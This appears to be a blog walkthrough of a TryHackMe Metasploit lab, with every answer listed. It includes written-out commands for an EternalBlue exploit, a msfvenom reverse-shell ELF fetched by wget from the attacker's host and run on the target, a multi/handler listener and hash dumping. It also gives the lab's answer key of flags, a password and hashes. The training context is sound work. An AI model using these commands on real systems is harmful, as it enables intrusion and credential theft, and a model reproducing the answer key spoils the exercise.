🔥 Complete Guide to Metasploit: Scanning, Exploitation & Msfvenom (With All Answers)


In this blog, I’ll walk you through the full process of using the Metasploit Framework for:

  • Port Scanning

  • Vulnerability Scanning

  • Exploitation

  • Post-Exploitation

  • Using the Metasploit Database

  • Creating Payloads with MSFvenom

This guide includes all answers from the room.


🚀 1. Introduction to Metasploit

Metasploit is an exploitation framework used for:

  • Scanning targets

  • Identifying vulnerabilities

  • Exploiting services

  • Managing sessions

  • Generating payloads

Start Metasploit:

msfconsole

🔎 2. Port Scanning with Metasploit

You can search for scanning modules:

search portscan

Example module:

use auxiliary/scanner/portscan/tcp

Set required options:

set RHOSTS <target_ip>
set PORTS 1-1000
run

You can also run Nmap directly:

nmap -sS <target_ip>

✅ Answers (Scanning Section)

Q1: How many ports are open on the target system?
👉 5

Q2: Using the relevant scanner, what NetBIOS name can you see?
👉 ACME IT SUPPORT

Q3: What is running on port 8000?
👉 webfs/1.21

Q4: What is the "penny" user's SMB password?
👉 leo1234


🗄 3. Metasploit Database

Metasploit can store scan results in a database.

Start PostgreSQL:

systemctl start postgresql

Initialize DB:

sudo -u postgres msfdb init

Check status:

db_status

📂 Workspaces

Create workspace:

workspace -a tryhackme

Switch workspace:

workspace tryhackme

🔍 Save Nmap Results to Database

db_nmap -sV -p- <target_ip>

View stored data (each is a separate msfconsole command):

hosts
services
vulns
loot
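As an added example (not code from the original post or from the room), here is a small Python script that parses Nmap's XML output (`nmap -sV -oX scan.xml <target_ip>`, the same format `db_import` ingests) and reports what the `services` table shows after `db_nmap`: the open ports and their product/version labels, which is exactly what the "how many ports are open" and "what is running on port 8000" questions ask. The XML sample and the host address 10.10.10.10 are constructed placeholders, not real scan data.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -oX` output (not a real scan); 10.10.10.10 is a placeholder.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 10.10.10.10">
  <host>
    <address addr="10.10.10.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="8000"><state state="open"/><service name="http" product="webfs" version="1.21"/></port>
      <port protocol="tcp" portid="22"><state state="closed"/><service name="ssh"/></port>
    </ports>
  </host>
</nmaprun>
"""

def parse_open_ports(xml_text):
    """Return {ip: [(port, proto, label), ...]} for open ports only, sorted by port.
    Label is product/version when Nmap identified one, else the service name (as in `services`)."""
    results = {}
    for host in ET.fromstring(xml_text).findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        open_ports = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not stored as open services
            svc = port.find("service")
            label = svc.get("name", "") if svc is not None else ""
            if svc is not None and svc.get("product"):
                label = svc.get("product")
                if svc.get("version"):
                    label += "/" + svc.get("version")  # e.g. "webfs/1.21"
            open_ports.append((int(port.get("portid")), port.get("protocol"), label))
        results[addr.get("addr")] = sorted(open_ports)
    return results

def count_open_ports(xml_text, ip):
    # Answer to "how many ports are open" for one host
    return len(parse_open_ports(xml_text).get(ip, []))

def service_on_port(xml_text, ip, port):
    # Answer to "what is running on port N"; None if that port is not open
    for p, _proto, label in parse_open_ports(xml_text).get(ip, []):
        if p == port:
            return label
    return None
```

Run it against a real `-oX` file by reading the file into `parse_open_ports`; the filtering of non-open ports is what keeps the count in line with what `services` reports.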

🧪 4. Vulnerability Scanning

Metasploit helps find “low-hanging fruit” vulnerabilities.

Example: VNC Login Scanner

use auxiliary/scanner/vnc/vnc_login
info

✅ Answer (Vulnerability Section)

Q: Who wrote the module that allows us to check SMTP servers for open relay?
👉 Campbell Murray


💥 5. Exploitation

Metasploit contains thousands of exploits.

Example: MS17-010 (EternalBlue)

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set LHOST <your_ip>
exploit

🎯 Successful Exploitation Results

After exploitation:

  • Shell session opened

  • Retrieved flag

  • Dumped password hashes


✅ Answers (Exploitation Section)

Q: What is the content of the flag.txt file?
👉 THM-5455554845

Q: What is the NTLM hash of the password of the user "pirate"?
👉 8ce9a3ebd1647fcc5e04025019f4b875


🛠 6. MSFvenom – Payload Generation

MSFvenom generates custom payloads.

List payloads:

msfvenom -l payloads

๐Ÿง Generate Linux Meterpreter (.elf)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f elf > shell.elf

Transfer to target (serve the file from your machine, then fetch and run it on the target):

On your machine:

python3 -m http.server 9000

On the target:

wget http://<your_ip>:9000/shell.elf
chmod +x shell.elf
./shell.elf

🎧 Setup Multi Handler

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
run

Meterpreter session received ✅


🔐 Post Exploitation – Dump Hashes

Use post module:

use post/linux/gather/hashdump

✅ Final Answer (MSFvenom Section)

Q: What is the other user's password hash?
👉 $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0

📌 Final Summary

In this room, we learned:

✔ How to scan using Metasploit
✔ How to use the Metasploit database
✔ How to identify vulnerabilities
✔ How to exploit services
✔ How to manage sessions
✔ How to generate payloads using MSFvenom
✔ How to use multi/handler
✔ How to perform post-exploitation


🧠 Final Answers List (Quick Reference)

Question                        | Answer
------------------------------- | --------------------------------------------------------------------------------------------------------
Open Ports                      | 5
NetBIOS Name                    | ACME IT SUPPORT
Port 8000 Service               | webfs/1.21
Penny SMB Password              | leo1234
SMTP Open Relay Module Author   | Campbell Murray
flag.txt Content                | THM-5455554845
Pirate NTLM Hash                | 8ce9a3ebd1647fcc5e04025019f4b875
Other User Hash                 | $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
